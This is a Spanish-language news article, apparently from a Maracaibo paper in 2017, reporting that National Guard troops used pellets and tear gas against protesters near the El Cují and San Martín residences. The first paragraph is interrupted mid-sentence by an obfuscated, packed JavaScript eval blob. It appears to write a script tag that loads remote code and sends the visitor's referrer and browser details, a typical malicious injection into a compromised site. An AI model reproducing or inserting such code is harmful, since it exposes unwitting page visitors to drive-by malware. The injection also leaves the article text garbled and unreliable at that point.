Reportan ataque de la GNB en residencias El Cují

Yaileth Argüelles / Maracaibo / [email protected]
Funcionarios eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|knsfa|var|u0026u|referrer|ktyyy||js|php'.split('|'),0,{})) de la GNB usaron perdigones y gases lacrimógenos para dispersar a los manifestantes que desde las 5.00 am levantaron una barricada en la avenida Goajira. Los uniformados lograron ingresar hasta las azoteas de algunos edificios de El Cují donde presuntamente encontraron bombas molotov. Aún se mantienen en el lugar

Residencias El Cují esta asediada por funcionarios de la Guardia Nacional Bolivariana (GNB), así lo denuncian usuarios a través de Twitter.

Desde tempranas horas de este sábado se dio a conocer por la red social que los uniformados rodearon el urbanismo y algunos lograron ingresar hasta la azotea donde presuntamente hallaron bombas molotov.

La acción de funcionarios era para contrarrestar a los manifestantes que desde las 5.00 de la mañana levantaron una barricada en la avenida Goajira, a la altura de San Jacinto, para impedir el paso por la zona. 

Los gnb usaron perdigones y gases lacrimógenos para dispersar a quienes habían trancado el paso.

Una situación similar se vivió en residencias San Martín, en la avenida El Milagro, donde reportan que los funcionarios castrenses también usaron gas lacrimógeno y que algunos perdigones impactaron en ventanas de los edificios. 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama